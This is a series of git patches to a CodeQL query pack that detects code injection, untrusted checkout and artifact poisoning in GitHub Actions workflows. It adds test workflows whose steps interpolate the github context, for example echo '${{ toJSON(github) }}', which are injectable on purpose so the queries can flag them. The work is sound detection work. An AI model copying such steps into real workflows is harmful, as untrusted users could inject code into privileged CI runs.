name: githubsecuritylab/actions-queries -version: 0.0.25 +version: 0.0.26 groups: - actions - queries From d3bff87f9accf334041cb821c21ad4a60fd29288 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 17 May 2024 23:10:29 +0200 Subject: [PATCH 300/707] Add github to json contexts --- ql/lib/codeql/actions/dataflow/FlowSources.qll | 4 ++-- .../Security/CWE-094/.github/workflows/test4.yml | 8 ++++++++ .../query-tests/Security/CWE-094/CodeInjection.expected | 2 ++ .../Security/CWE-094/PrivilegedCodeInjection.expected | 4 ++++ 4 files changed, 16 insertions(+), 2 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 063a3f671a32..d9f7b14edd3b 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -178,7 +178,7 @@ private predicate jsonEvent(string context) { reg = [ // json - "github\\.event", "github\\.event\\.client_payload", "github\\.event\\.comment", + "github", "github\\.event", "github\\.event\\.client_payload", "github\\.event\\.comment", "github\\.event\\.commits", "github\\.event\\.discussion", "github\\.event\\.head_commit", "github\\.event\\.head_commit\\.author", "github\\.event\\.head_commit\\.committer", "github\\.event\\.inputs", "github\\.event\\.issue", "github\\.event\\.merge_group", @@ -262,7 +262,7 @@ class GitHubEventJsonSource extends RemoteFlowSource { ) or contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), _) and - Utils::normalizeExpr(context).regexpMatch(".*\\bgithub.event\\b.*") + Utils::normalizeExpr(context).regexpMatch(".*\\bgithub(\\.event)?\\b.*") ) ) and flag = "json" diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test4.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test4.yml index c4380bfa8afa..75bf0527ee8b 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/test4.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test4.yml @@ -17,3 +17,11 @@ jobs: - name: Dump GitHub issue context id: github_issue_step run: echo '${{ toJSON(github.event.issue) }}' + + - name: Dump GitHub issue context + id: github_issue_step + run: echo '${{ toJSON(github) }}' + + - name: Dump GitHub issue context + id: github_issue_step + run: echo '${{ toJSON(github.event) }}' diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index dc653a074e98..e47c6dd340cb 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected @@ -229,6 +229,8 @@ nodes | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | semmle.label | needs.parse-issue.outputs.payload | | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | semmle.label | toJSON(github.event.comment) | | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | semmle.label | toJSON(github.event.issue) | +| .github/workflows/test4.yml:23:21:23:41 | toJSON(github) | semmle.label | toJSON(github) | +| .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | semmle.label | toJSON(github.event) | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected index ab0a69a8fa8b..848e08cf69ed 100644 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected @@ -229,6 +229,8 @@ nodes | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | semmle.label | needs.parse-issue.outputs.payload | | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | semmle.label | toJSON(github.event.comment) | | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | semmle.label | toJSON(github.event.issue) | +| .github/workflows/test4.yml:23:21:23:41 | toJSON(github) | semmle.label | toJSON(github) | +| .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | semmle.label | toJSON(github.event) | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | @@ -340,6 +342,8 @@ subpaths | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | ${{ toJSON(github.event.comment) }} | | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | ${{ toJSON(github.event.issue) }} | +| .github/workflows/test4.yml:23:21:23:41 | toJSON(github) | .github/workflows/test4.yml:23:21:23:41 | toJSON(github) | .github/workflows/test4.yml:23:21:23:41 | toJSON(github) | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:23:21:23:41 | toJSON(github) | ${{ toJSON(github) }} | +| .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | ${{ toJSON(github.event) }} | | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | From 313acfcac20a34cee1c078c7534e564e6ac3da71 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 17 May 2024 12:28:06 +0200 Subject: [PATCH 301/707] Add externally triggereable data model and predicates --- ql/lib/codeql/actions/Ast.qll | 2 ++ ql/lib/codeql/actions/ast/internal/Ast.qll | 5 +++++ ql/lib/codeql/actions/dataflow/ExternalFlow.qll | 9 +++++++++ .../internal/ExternalFlowExtensions.qll | 7 ++++++- ql/lib/ext/workflow-models/workflow-models.yml | 17 ++++++++++++++++- 5 files changed, 38 insertions(+), 2 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 1e57c8f3d29d..cab2fc05ac51 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -348,6 +348,8 @@ abstract class Job extends AstNode instanceof JobImpl { predicate isPrivileged() { super.isPrivileged() } + predicate isExternallyTriggerable() { super.isExternallyTriggerable() } + string getARunsOnLabel() { result = super.getARunsOnLabel() } } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 0370b1ca4c3f..46bbcaaf29ef 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -703,6 +703,11 @@ class JobImpl extends AstNodeImpl, TJobNode { /** Gets the strategy for this job. */ StrategyImpl getStrategy() { result.getNode() = n.lookup("strategy") } + /** Holds if the job can be triggered by an external actor. */ + predicate isExternallyTriggerable() { + externallyTriggerableEventsDataModel(this.getATriggerEvent().getName()) + } + /** Holds if the job is privileged. */ predicate isPrivileged() { // the job has privileged runtime permissions diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index a52cc427d359..c46a3ee64a1f 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -38,6 +38,15 @@ predicate contextTriggerDataModel(string trigger, string context_prefix) { Extensions::contextTriggerDataModel(trigger, context_prefix) } +/** + * MaD models for externally triggerable events + * Fields: + * - event: Event name + */ +predicate externallyTriggerableEventsDataModel(string event) { + Extensions::externallyTriggerableEventsDataModel(event) +} + /** * MaD sources * Fields: diff --git a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll index 415c02dc1ba1..6c64b72e6b4c 100644 --- a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll +++ b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll @@ -36,6 +36,11 @@ extensible predicate workflowDataModel( extensible predicate repositoryDataModel(string visibility, string default_branch_name); /** - * Holds if context/trigger mapping exists for the given parameters. + * Holds if a context expression starting with context_prefix is available for a given trigger. */ extensible predicate contextTriggerDataModel(string trigger, string context_prefix); + +/** + * Holds if a given trigger event can be fired by an external actor. + */ +extensible predicate externallyTriggerableEventsDataModel(string event); diff --git a/ql/lib/ext/workflow-models/workflow-models.yml b/ql/lib/ext/workflow-models/workflow-models.yml index 404e894a5f8a..ff02589fb844 100644 --- a/ql/lib/ext/workflow-models/workflow-models.yml +++ b/ql/lib/ext/workflow-models/workflow-models.yml @@ -11,7 +11,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: contextTriggerDataModel data: - # This predicate maps triggering events with the github event context available for that event - ["commit_comment", "github.event.comment"] - ["discussion", "github.event.discussion"] - ["discussion_comment", "github.event.comment"] @@ -55,3 +54,19 @@ extensions: - ["workflow_call", "github.event.review"] - ["workflow_call", "github.event.workflow"] - ["workflow_call", "github.event.workflow_run"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: externallyTriggerableEventsDataModel + data: + - ["discussion"] + - ["discussion_comment"] + - ["fork"] + - ["issue_comment"] + - ["issues"] + - ["pull_request"] + - ["pull_request_comment"] + - ["pull_request_review"] + - ["pull_request_review_comment"] + - ["pull_request_target"] + - ["workflow_run"] # depending on trigger workflow + - ["workflow_call"] # depending on caller From 5d32071adcacbfeb2ce7b1c1f264f34266ec9f55 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 21 May 2024 23:02:34 +0200 Subject: [PATCH 302/707] resolve conflicts --- ql/lib/codeql/actions/Ast.qll | 164 +------------- ql/lib/codeql/actions/Helper.qll | 209 ++++++++++++++++++ ql/lib/codeql/actions/ast/internal/Ast.qll | 134 +++++++---- .../actions/controlflow/internal/Cfg.qll | 25 ++- .../codeql/actions/dataflow/FlowSources.qll | 54 ++--- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 14 +- .../dataflow/internal/DataFlowPrivate.qll | 19 +- .../dataflow/internal/DataFlowPublic.qll | 3 +- .../security/EnvPathInjectionQuery.qll | 4 +- .../actions/security/EnvVarInjectionQuery.qll | 4 +- .../actions/security/PoisonableSteps.qll | 2 +- .../security/UntrustedCheckoutQuery.qll | 12 +- ql/src/Debug/partial.ql | 2 +- ...jection.ql => EnvPathInjectionCritical.ql} | 15 +- ...Injection.ql => EnvPathInjectionMedium.ql} | 11 +- ...njection.ql => EnvVarInjectionCritical.ql} | 13 +- ...rInjection.ql => EnvVarInjectionMedium.ql} | 11 +- ...jection.ql => CommandInjectionCritical.ql} | 17 +- ...Injection.ql => CommandInjectionMedium.ql} | 10 +- ...eInjection.ql => CodeInjectionCritical.ql} | 15 +- ...odeInjection.ql => CodeInjectionMedium.ql} | 12 +- ql/src/Security/CWE-349/CachePoisoning.ql | 12 +- .../CWE-349/CachePoisoningByCodeInjection.ql | 4 +- .../UntrustedCheckoutTOCTOUCritical.ql | 4 +- .../CWE-367/UntrustedCheckoutTOCTOUHigh.ql | 2 + ...soning.ql => ArtifactPoisoningCritical.ql} | 15 +- ...oisoning.ql => ArtifactPoisoningMedium.ql} | 10 +- ...itical.ql => UntrustedCheckoutCritical.ql} | 10 +- ...eckoutHigh.ql => UntrustedCheckoutHigh.ql} | 8 +- .../CWE-829/UntrustedCheckoutMedium.ql | 31 +++ ql/test/library-tests/test.ql | 8 +- .../Security/CWE-077/EnvPathInjection.qlref | 1 - ...cted => EnvPathInjectionCritical.expected} | 10 +- .../CWE-077/EnvPathInjectionCritical.qlref | 1 + ...pected => EnvPathInjectionMedium.expected} | 0 .../CWE-077/EnvPathInjectionMedium.qlref | 1 + .../Security/CWE-077/EnvVarInjection.qlref | 1 - ...ected => EnvVarInjectionCritical.expected} | 22 +- .../CWE-077/EnvVarInjectionCritical.qlref | 1 + ...xpected => EnvVarInjectionMedium.expected} | 0 .../CWE-077/EnvVarInjectionMedium.qlref | 1 + .../CWE-077/PrivilegedEnvPathInjection.qlref | 1 - .../CWE-077/PrivilegedEnvVarInjection.qlref | 1 - .../Security/CWE-078/CommandInjection.qlref | 1 - ...cted => CommandInjectionCritical.expected} | 4 +- .../CWE-078/CommandInjectionCritical.qlref | 1 + ...pected => CommandInjectionMedium.expected} | 0 .../CWE-078/CommandInjectionMedium.qlref | 1 + .../CWE-078/PrivilegedCommandInjection.qlref | 1 - .../.github/actions/action1/action.yml | 7 + .../{ => .github/actions}/action2/action.yml | 0 .../.github/actions/action3/action.yml | 9 + .../.github/actions/action4/action.yml | 7 + .../.github/actions/action5/action.yml | 26 +++ .../.github/workflows/changelog_required.yml | 9 - .../workflows/changelog_required_prt.yml | 9 - .../workflows/composite-action-caller-1.yml | 10 + .../workflows/composite-action-caller-2.yml | 10 + .../workflows/composite-action-caller-3.yml | 14 ++ ...{changelog.yml => reusable-workflow-1.yml} | 17 +- ...g_from_prt.yml => reusable-workflow-2.yml} | 17 +- .../workflows/reusable-workflow-caller-1.yml | 11 + .../workflows/reusable-workflow-caller-2.yml | 10 + .../Security/CWE-094/CodeInjection.qlref | 1 - ...xpected => CodeInjectionCritical.expected} | 191 ++++++++-------- .../CWE-094/CodeInjectionCritical.qlref | 1 + ....expected => CodeInjectionMedium.expected} | 43 +++- .../CWE-094/CodeInjectionMedium.qlref | 1 + .../CWE-094/PrivilegedCodeInjection.qlref | 1 - .../CWE-367/.github/workflows/actor.yml | 21 ++ .../Security/CWE-829/ArtifactPoisoning.qlref | 2 - ...ted => ArtifactPoisoningCritical.expected} | 26 +-- .../CWE-829/ArtifactPoisoningCritical.qlref | 2 + ...ected => ArtifactPoisoningMedium.expected} | 0 .../CWE-829/ArtifactPoisoningMedium.qlref | 2 + .../CWE-829/PrivilegedArtifactPoisoning.qlref | 2 - .../PrivilegedUntrustedCheckoutCritical.qlref | 1 - .../PrivilegedUntrustedCheckoutHigh.qlref | 1 - ...ted => UntrustedCheckoutCritical.expected} | 0 .../CWE-829/UntrustedCheckoutCritical.qlref | 1 + ...xpected => UntrustedCheckoutHigh.expected} | 0 .../CWE-829/UntrustedCheckoutHigh.qlref | 1 + .../CWE-829/UntrustedCheckoutMedium.expected | 0 .../CWE-829/UntrustedCheckoutMedium.qlref | 1 + 84 files changed, 812 insertions(+), 544 deletions(-) create mode 100644 ql/lib/codeql/actions/Helper.qll rename ql/src/Security/CWE-077/{PrivilegedEnvPathInjection.ql => EnvPathInjectionCritical.ql} (74%) rename ql/src/Security/CWE-077/{EnvPathInjection.ql => EnvPathInjectionMedium.ql} (78%) rename ql/src/Security/CWE-077/{PrivilegedEnvVarInjection.ql => EnvVarInjectionCritical.ql} (77%) rename ql/src/Security/CWE-077/{EnvVarInjection.ql => EnvVarInjectionMedium.ql} (80%) rename ql/src/Security/CWE-078/{PrivilegedCommandInjection.ql => CommandInjectionCritical.ql} (59%) rename ql/src/Security/CWE-078/{CommandInjection.ql => CommandInjectionMedium.ql} (79%) rename ql/src/Security/CWE-094/{PrivilegedCodeInjection.ql => CodeInjectionCritical.ql} (68%) rename ql/src/Security/CWE-094/{CodeInjection.ql => CodeInjectionMedium.ql} (77%) rename ql/src/Security/CWE-829/{PrivilegedArtifactPoisoning.ql => ArtifactPoisoningCritical.ql} (64%) rename ql/src/Security/CWE-829/{ArtifactPoisoning.ql => ArtifactPoisoningMedium.ql} (77%) rename ql/src/Security/CWE-829/{PrivilegedUntrustedCheckoutCritical.ql => UntrustedCheckoutCritical.ql} (85%) rename ql/src/Security/CWE-829/{PrivilegedUntrustedCheckoutHigh.ql => UntrustedCheckoutHigh.ql} (87%) create mode 100644 ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql delete mode 100644 ql/test/query-tests/Security/CWE-077/EnvPathInjection.qlref rename ql/test/query-tests/Security/CWE-077/{PrivilegedEnvPathInjection.expected => EnvPathInjectionCritical.expected} (71%) create mode 100644 ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.qlref rename ql/test/query-tests/Security/CWE-077/{EnvPathInjection.expected => EnvPathInjectionMedium.expected} (100%) create mode 100644 ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.qlref delete mode 100644 ql/test/query-tests/Security/CWE-077/EnvVarInjection.qlref rename ql/test/query-tests/Security/CWE-077/{PrivilegedEnvVarInjection.expected => EnvVarInjectionCritical.expected} (71%) create mode 100644 ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.qlref rename ql/test/query-tests/Security/CWE-077/{EnvVarInjection.expected => EnvVarInjectionMedium.expected} (100%) create mode 100644 ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.qlref delete mode 100644 ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.qlref delete mode 100644 ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.qlref delete mode 100644 ql/test/query-tests/Security/CWE-078/CommandInjection.qlref rename ql/test/query-tests/Security/CWE-078/{PrivilegedCommandInjection.expected => CommandInjectionCritical.expected} (61%) create mode 100644 ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.qlref rename ql/test/query-tests/Security/CWE-078/{CommandInjection.expected => CommandInjectionMedium.expected} (100%) create mode 100644 ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.qlref delete mode 100644 ql/test/query-tests/Security/CWE-078/PrivilegedCommandInjection.qlref create mode 100644 ql/test/query-tests/Security/CWE-094/.github/actions/action1/action.yml rename ql/test/query-tests/Security/CWE-094/{ => .github/actions}/action2/action.yml (100%) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/actions/action3/action.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/actions/action4/action.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml delete mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_required.yml delete mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_required_prt.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-1.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-2.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-3.yml rename ql/test/query-tests/Security/CWE-094/.github/workflows/{changelog.yml => reusable-workflow-1.yml} (90%) rename ql/test/query-tests/Security/CWE-094/.github/workflows/{changelog_from_prt.yml => reusable-workflow-2.yml} (90%) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-1.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-2.yml delete mode 100644 ql/test/query-tests/Security/CWE-094/CodeInjection.qlref rename ql/test/query-tests/Security/CWE-094/{PrivilegedCodeInjection.expected => CodeInjectionCritical.expected} (65%) create mode 100644 ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.qlref rename ql/test/query-tests/Security/CWE-094/{CodeInjection.expected => CodeInjectionMedium.expected} (74%) create mode 100644 ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.qlref delete mode 100644 ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.qlref create mode 100644 ql/test/query-tests/Security/CWE-367/.github/workflows/actor.yml delete mode 100644 ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.qlref rename ql/test/query-tests/Security/CWE-829/{PrivilegedArtifactPoisoning.expected => ArtifactPoisoningCritical.expected} (73%) create mode 100644 ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.qlref rename ql/test/query-tests/Security/CWE-829/{ArtifactPoisoning.expected => ArtifactPoisoningMedium.expected} (100%) create mode 100644 ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.qlref delete mode 100644 ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.qlref delete mode 100644 ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.qlref delete mode 100644 ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.qlref rename ql/test/query-tests/Security/CWE-829/{PrivilegedUntrustedCheckoutCritical.expected => UntrustedCheckoutCritical.expected} (100%) create mode 100644 ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.qlref rename ql/test/query-tests/Security/CWE-829/{PrivilegedUntrustedCheckoutHigh.expected => UntrustedCheckoutHigh.expected} (100%) create mode 100644 ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.qlref create mode 100644 ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected create mode 100644 ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.qlref diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index cab2fc05ac51..9be2580f36e9 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -1,160 +1,6 @@ private import codeql.actions.ast.internal.Ast private import codeql.Locations - -module Utils { - bindingset[expr] - string normalizeExpr(string expr) { - result = - expr.regexpReplaceAll("\\['([a-zA-Z0-9_\\*\\-]+)'\\]", ".$1") - .regexpReplaceAll("\\[\"([a-zA-Z0-9_\\*\\-]+)\"\\]", ".$1") - .regexpReplaceAll("\\s*\\.\\s*", ".") - } - - bindingset[regex] - string wrapRegexp(string regex) { - result = - [ - "\\b" + regex + "\\b", "fromJSON\\(\\s*" + regex + "\\s*\\)", - "toJSON\\(\\s*" + regex + "\\s*\\)" - ] - } - - bindingset[str] - private string trimQuotes(string str) { - result = str.trim().regexpReplaceAll("^(\"|')", "").regexpReplaceAll("(\"|')$", "") - } - - bindingset[line, var] - predicate extractLineAssignment(string line, string var, string key, string value) { - exists(string assignment | - // single line assignment - assignment = - line.regexpCapture("(echo|Write-Output)\\s+(.*)>>\\s*(\"|')?\\$(\\{)?GITHUB_" + - var.toUpperCase() + "(\\})?(\"|')?", 2) and - count(assignment.splitAt("=")) = 2 and - key = trimQuotes(assignment.splitAt("=", 0)) and - value = trimQuotes(assignment.splitAt("=", 1)) - or - // workflow command assignment - assignment = - line.regexpCapture("(echo|Write-Output)\\s+(\"|')?::set-" + var.toLowerCase() + - "\\s+name=(.*)(\"|')?", 3).regexpReplaceAll("^\"", "").regexpReplaceAll("\"$", "") and - key = trimQuotes(assignment.splitAt("::", 0)) and - value = trimQuotes(assignment.splitAt("::", 1)) - ) - } - - bindingset[var] - private string multilineAssignmentRegex(string var) { - // eg: - // echo "PR_TITLE<> $GITHUB_ENV - // echo "$TITLE" >> $GITHUB_ENV - // echo "EOF" >> $GITHUB_ENV - result = - ".*(echo|Write-Output)\\s+(.*)<<[\\-]*\\s*([A-Z]*)EOF(.+)(echo|Write-Output)\\s+(\"|')?([A-Z]*)EOF(\"|')?\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" - + var.toUpperCase() + "(\\})?(\"|')?.*" - } - - bindingset[var] - private string multilineBlockAssignmentRegex(string var) { - // eg: - // { - // echo 'JSON_RESPONSE<> "$GITHUB_ENV" - // echo EOF - // } >> "$GITHUB_ENV" - result = - ".*\\{(\\s|::NEW_LINE::)*(echo|Write-Output)\\s+(.*)<<[\\-]*\\s*([A-Z]*)EOF(.+)(echo|Write-Output)\\s+(\"|')?([A-Z]*)EOF(\"|')?(\\s|::NEW_LINE::)*\\}\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" - + var.toUpperCase() + "(\\})?(\"|')?.*" - } - - bindingset[var] - private string multilineHereDocAssignmentRegex(string var) { - // eg: - // cat <<-EOF >> "$GITHUB_ENV" - // echo "FOO=$TITLE" - // EOF - result = - ".*cat\\s*<<[\\-]*\\s*[A-Z]*EOF\\s*>>\\s*[\"']*\\$[\\{]*GITHUB_.*" + var.toUpperCase() + - "[\\}]*[\"']*.*(echo|Write-Output)\\s+([^=]+)=(.*)::NEW_LINE::.*EOF.*" - } - - bindingset[script, var] - predicate extractMultilineAssignment(string script, string var, string key, string value) { - // multiline assignment - exists(string flattenedScript | - flattenedScript = script.replaceAll("\n", "::NEW_LINE::") and - value = - "$(" + - trimQuotes(flattenedScript.regexpCapture(multilineAssignmentRegex(var), 4)) - .regexpReplaceAll("\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + var.toUpperCase() + - "(\\})?(\"|')?", "") - .replaceAll("::NEW_LINE::", "\n") - .trim() - .splitAt("\n") + ")" and - key = trimQuotes(flattenedScript.regexpCapture(multilineAssignmentRegex(var), 2)) - ) - or - // multiline block assignment - exists(string flattenedScript | - flattenedScript = script.replaceAll("\n", "::NEW_LINE::") and - value = - "$(" + - trimQuotes(flattenedScript.regexpCapture(multilineBlockAssignmentRegex(var), 5)) - .regexpReplaceAll("\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + var.toUpperCase() + - "(\\})?(\"|')?", "") - .replaceAll("::NEW_LINE::", "\n") - .trim() - .splitAt("\n") + ")" and - key = trimQuotes(flattenedScript.regexpCapture(multilineBlockAssignmentRegex(var), 3)) - ) - or - // multiline heredoc assignment - exists(string flattenedScript | - flattenedScript = script.replaceAll("\n", "::NEW_LINE::") and - value = - trimQuotes(flattenedScript.regexpCapture(multilineHereDocAssignmentRegex(var), 3)) - .regexpReplaceAll("\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + var.toUpperCase() + - "(\\})?(\"|')?", "") - .replaceAll("::NEW_LINE::", "\n") - .trim() - .splitAt("\n") and - key = trimQuotes(flattenedScript.regexpCapture(multilineHereDocAssignmentRegex(var), 2)) - ) - } - - bindingset[line] - predicate extractPathAssignment(string line, string value) { - exists(string path | - // single path assignment - path = - line.regexpCapture("(echo|Write-Output)\\s+(.*)>>\\s*(\"|')?\\$(\\{)?GITHUB_PATH(\\})?(\"|')?", - 2) and - value = trimQuotes(path) - or - // workflow command assignment - path = - line.regexpCapture("(echo|Write-Output)\\s+(\"|')?::add-path::(.*)(\"|')?", 3) - .regexpReplaceAll("^\"", "") - .regexpReplaceAll("\"$", "") and - value = trimQuotes(path) - ) - } - - predicate writeToGitHubEnv(Run run, string key, string value) { - extractLineAssignment(run.getScript().splitAt("\n"), "ENV", key, value) or - extractMultilineAssignment(run.getScript(), "ENV", key, value) - } - - predicate writeToGitHubOutput(Run run, string key, string value) { - extractLineAssignment(run.getScript().splitAt("\n"), "OUTPUT", key, value) or - extractMultilineAssignment(run.getScript(), "OUTPUT", key, value) - } - - predicate writeToGitHubPath(Run run, string value) { - extractPathAssignment(run.getScript().splitAt("\n"), value) - } -} +import codeql.actions.Helper class AstNode instanceof AstNodeImpl { AstNode getAChildNode() { result = super.getAChildNode() } @@ -193,7 +39,7 @@ class Expression extends AstNode instanceof ExpressionImpl { string getRawExpression() { result = rawExpression } - string getNormalizedExpression() { result = Utils::normalizeExpr(expression) } + string getNormalizedExpression() { result = normalizeExpr(expression) } } /** A common class for `env` in workflow, job or step. */ @@ -227,6 +73,10 @@ class CompositeAction extends AstNode instanceof CompositeActionImpl { Input getAnInput() { result = super.getAnInput() } Input getInput(string inputName) { result = super.getInput(inputName) } + + LocalJob getACaller() { result = super.getACaller() } + + predicate isPrivileged() 